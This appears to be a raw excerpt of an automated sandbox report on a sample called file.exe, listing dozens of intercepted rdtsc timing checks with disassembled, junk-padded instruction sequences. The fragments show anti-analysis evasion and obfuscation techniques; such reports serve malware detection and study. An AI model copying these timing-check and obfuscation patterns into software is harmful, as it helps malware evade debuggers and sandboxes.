                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 870437 second address: 870455 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF17CC823B5h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 870953 second address: 870957 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 870957 second address: 87096B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FF17CC823A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jbe 00007FF17CC823A8h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87096B second address: 870971 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 870971 second address: 870975 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 870975 second address: 870991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b ja 00007FF17CBED4E6h 0x00000011 jnc 00007FF17CBED4E6h 0x00000017 pushad 0x00000018 popad 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 875092 second address: 8750AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF17CC823B8h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8750AF second address: 8750B9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF17CBED4ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 876A4E second address: 876A52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 876A52 second address: 876A69 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d jnp 00007FF17CBED4F0h 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 876A69 second address: 876A7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007FF17CC823A8h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83BDD2 second address: 83BDD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87C98A second address: 87C996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87C996 second address: 87C99A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87C99A second address: 87C9B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF17CC823B3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87CAC2 second address: 87CAD7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF17CBED4E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jbe 00007FF17CBED4E6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87CAD7 second address: 87CADC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87CADC second address: 87CAEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF17CBED4EAh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87CDD6 second address: 87CDDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87CDDC second address: 87CDE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87CDE5 second address: 87CDE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87DB57 second address: 87DB5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87DE7A second address: 87DE7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87DE7E second address: 87DE90 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF17CBED4E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87DE90 second address: 87DE95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87E07F second address: 87E083 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87E8FA second address: 87E904 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF17CC823ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87EABB second address: 87EAC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87EAC0 second address: 87EAC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87EBCD second address: 87EBDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 js 00007FF17CBED4F4h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87EBDE second address: 87EBE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87ECF5 second address: 87ECFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87ECFB second address: 87ED25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pushad 0x00000008 push edi 0x00000009 jmp 00007FF17CC823B8h 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007FF17CC823A6h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87ED25 second address: 87ED29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87FC1A second address: 87FC57 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D2747h], ebx 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007FF17CC823A8h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c mov dword ptr [ebp+122D27F8h], edi 0x00000032 push 00000000h 0x00000034 stc 0x00000035 xchg eax, ebx 0x00000036 pushad 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87FC57 second address: 87FC63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87FAA8 second address: 87FAAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88322D second address: 883241 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF17CBED4EEh 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 840E66 second address: 840E6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 840E6A second address: 840E70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 840E70 second address: 840E77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88382E second address: 8838C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007FF17CBED4E8h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 jmp 00007FF17CBED4F4h 0x0000002a jmp 00007FF17CBED4F7h 0x0000002f jl 00007FF17CBED4F2h 0x00000035 jns 00007FF17CBED4ECh 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push edx 0x00000042 call 00007FF17CBED4E8h 0x00000047 pop edx 0x00000048 mov dword ptr [esp+04h], edx 0x0000004c add dword ptr [esp+04h], 00000016h 0x00000054 inc edx 0x00000055 push edx 0x00000056 ret 0x00000057 pop edx 0x00000058 ret 0x00000059 jmp 00007FF17CBED4EAh 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 push esi 0x00000064 pop esi 0x00000065 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8838C9 second address: 8838CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 884357 second address: 8843C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 mov esi, dword ptr [ebp+122D3604h] 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007FF17CBED4E8h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 00000018h 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a mov dword ptr [ebp+12462F16h], edx 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ecx 0x00000035 call 00007FF17CBED4E8h 0x0000003a pop ecx 0x0000003b mov dword ptr [esp+04h], ecx 0x0000003f add dword ptr [esp+04h], 00000014h 0x00000047 inc ecx 0x00000048 push ecx 0x00000049 ret 0x0000004a pop ecx 0x0000004b ret 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 pushad 0x00000051 popad 0x00000052 jmp 00007FF17CBED4F6h 0x00000057 popad 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 885AE9 second address: 885B7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF17CC823B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+122D28C2h], ebx 0x00000012 stc 0x00000013 push 00000000h 0x00000015 mov esi, 2EF4F9F4h 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push ebx 0x0000001f call 00007FF17CC823A8h 0x00000024 pop ebx 0x00000025 mov dword ptr [esp+04h], ebx 0x00000029 add dword ptr [esp+04h], 0000001Bh 0x00000031 inc ebx 0x00000032 push ebx 0x00000033 ret 0x00000034 pop ebx 0x00000035 ret 0x00000036 jne 00007FF17CC823ACh 0x0000003c mov esi, 08CEE7FDh 0x00000041 call 00007FF17CC823B5h 0x00000046 xor dword ptr [ebp+12462E7Eh], ebx 0x0000004c pop edi 0x0000004d xchg eax, ebx 0x0000004e pushad 0x0000004f pushad 0x00000050 jnc 00007FF17CC823A6h 0x00000056 pushad 0x00000057 popad 0x00000058 popad 0x00000059 je 00007FF17CC823ACh 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 884CC8 second address: 884CCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88588C second address: 885896 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF17CC823ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 884CCD second address: 884CD2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8865B2 second address: 8865C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FF17CC823A6h 0x0000000a popad 0x0000000b pop edx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push edi 0x00000013 pop edi 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8865C7 second address: 8865CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8870A1 second address: 8870AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FF17CC823A6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88A7D3 second address: 88A7EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edx 0x00000006 jg 00007FF17CBED4E6h 0x0000000c pop edx 0x0000000d pushad 0x0000000e push edx 0x0000000f pop edx 0x00000010 jne 00007FF17CBED4E6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88A7EB second address: 88A7F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88A7F1 second address: 88A7F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88E1D7 second address: 88E232 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007FF17CC823A8h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 0000001Ch 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 stc 0x00000024 push 00000000h 0x00000026 sub dword ptr [ebp+122D2AC5h], esi 0x0000002c push 00000000h 0x0000002e add dword ptr [ebp+122D1F0Ah], edx 0x00000034 xchg eax, esi 0x00000035 push ecx 0x00000036 jmp 00007FF17CC823B4h 0x0000003b pop ecx 0x0000003c push eax 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88E232 second address: 88E236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 892486 second address: 89248C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89248C second address: 892490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8941D9 second address: 8941DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8941DE second address: 8941E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 893358 second address: 89335D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8952D9 second address: 8952F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF17CBED4F4h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8952F5 second address: 8952F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 895412 second address: 895416 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8973E9 second address: 8973EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 898314 second address: 89831B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8975C1 second address: 8975C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8995F4 second address: 8995F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8995F8 second address: 89969E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FF17CC823A6h 0x00000009 jmp 00007FF17CC823B4h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 jnl 00007FF17CC823ABh 0x00000018 push dword ptr fs:[00000000h] 0x0000001f push 00000000h 0x00000021 push esi 0x00000022 call 00007FF17CC823A8h 0x00000027 pop esi 0x00000028 mov dword ptr [esp+04h], esi 0x0000002c add dword ptr [esp+04h], 00000015h 0x00000034 inc esi 0x00000035 push esi 0x00000036 ret 0x00000037 pop esi 0x00000038 ret 0x00000039 mov dword ptr [ebp+122D302Dh], ebx 0x0000003f mov dword ptr fs:[00000000h], esp 0x00000046 jno 00007FF17CC823ABh 0x0000004c mov eax, dword ptr [ebp+122D00DDh] 0x00000052 push 00000000h 0x00000054 push eax 0x00000055 call 00007FF17CC823A8h 0x0000005a pop eax 0x0000005b mov dword ptr [esp+04h], eax 0x0000005f add dword ptr [esp+04h], 00000015h 0x00000067 inc eax 0x00000068 push eax 0x00000069 ret 0x0000006a pop eax 0x0000006b ret 0x0000006c push FFFFFFFFh 0x0000006e mov edi, edx 0x00000070 nop 0x00000071 pushad 0x00000072 jmp 00007FF17CC823B1h 0x00000077 push eax 0x00000078 push edx 0x00000079 pushad 0x0000007a popad 0x0000007b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89C94B second address: 89C982 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a pushad 0x0000000b jmp 00007FF17CBED4F5h 0x00000010 or dword ptr [ebp+122D28D0h], ebx 0x00000016 popad 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b mov dword ptr [ebp+12462F3Ch], esi 0x00000021 push eax 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89A7C0 second address: 89A7D6 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF17CC823A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jp 00007FF17CC823B0h 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89CB2F second address: 89CB33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89CB33 second address: 89CB39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89BA7D second address: 89BA81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AA894 second address: 8AA8CE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 jmp 00007FF17CC823ABh 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 pushad 0x00000012 js 00007FF17CC823ACh 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FF17CC823B4h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AA8CE second address: 8AA8D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AA984 second address: 8AA9A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF17CC823B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AA9A9 second address: 8AA9AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AA9AD second address: 8AA9B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AA9B3 second address: 8AA9B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AA9B8 second address: 8AA9CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jl 00007FF17CC823B0h 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AAA92 second address: 8AAA97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AAA97 second address: 8AAAC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF17CC823B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF17CC823AFh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AAAC0 second address: 8AAB04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c jmp 00007FF17CBED4EEh 0x00000011 pop eax 0x00000012 mov eax, dword ptr [eax] 0x00000014 jng 00007FF17CBED4FFh 0x0000001a jmp 00007FF17CBED4F9h 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 push ecx 0x00000024 push edi 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AE485 second address: 8AE48F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
